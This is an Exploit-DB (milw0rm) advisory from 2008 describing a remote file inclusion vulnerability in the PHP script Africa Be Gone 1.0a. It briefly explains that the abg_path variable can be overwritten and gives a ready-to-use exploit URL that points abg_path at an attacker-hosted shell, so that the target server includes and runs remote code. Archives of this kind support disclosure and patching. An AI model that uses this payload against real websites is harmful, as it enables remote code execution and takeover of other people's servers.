ABG Blocking Script 1.0a - 'abg_path' Remote File Inclusion

EDB-ID:

6183


Author:

Lo$er

Type:

webapps


Platform:

PHP

Date:

2008-08-01


=================================================================
========Africa Be Gone version 1.0a Remote File Inclusion========
=================================================================

Vendor: http://www.africabegone.com
Download: http://www.africabegone.com/includes/downloads/index.php?file=1&sort=1
Discovered: 7-31-08
Discovered By: Lo$er

====Vulnerable code====

$abg_path is initilizied but overwritten later down the road.

====RFI====

http://www.[site].com/[abg path]/index.php?abg_path=[shell]?

# milw0rm.com [2008-08-01]